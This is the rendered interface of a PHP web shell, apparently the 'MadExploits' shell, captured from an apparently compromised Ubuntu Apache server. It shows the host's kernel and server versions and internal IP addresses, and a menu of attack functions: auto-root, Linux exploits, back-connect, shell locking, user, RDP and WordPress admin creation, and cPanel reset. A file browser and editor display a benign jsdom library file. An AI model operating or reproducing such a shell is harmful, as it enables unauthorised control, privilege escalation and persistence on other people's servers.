Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
nodejs /
jsdom /
lib /
jsdom /
[ HOME SHELL ]
Name
Size
Permission
Action
browser
[ DIR ]
drwxr-xr-x
level2
[ DIR ]
drwxr-xr-x
level3
[ DIR ]
drwxr-xr-x
living
[ DIR ]
drwxr-xr-x
named-properties-tracker.js
4.54
KB
-rw-r--r--
utils.js
4.36
KB
-rw-r--r--
virtual-console.js
760
B
-rw-r--r--
vm-shim.js
2.98
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : virtual-console.js
"use strict"; const { EventEmitter } = require("events"); module.exports = class VirtualConsole extends EventEmitter { constructor() { super(); this.on("error", () => { // If "error" event has no listeners, // EventEmitter throws an exception }); } sendTo(anyConsole, options) { if (options === undefined) { options = {}; } for (const method of Object.keys(anyConsole)) { if (typeof anyConsole[method] === "function") { function onMethodCall(...args) { anyConsole[method](...args); } this.on(method, onMethodCall); } } if (!options.omitJSDOMErrors) { this.on("jsdomError", e => anyConsole.error(e.stack, e.detail)); } return this; } };
Close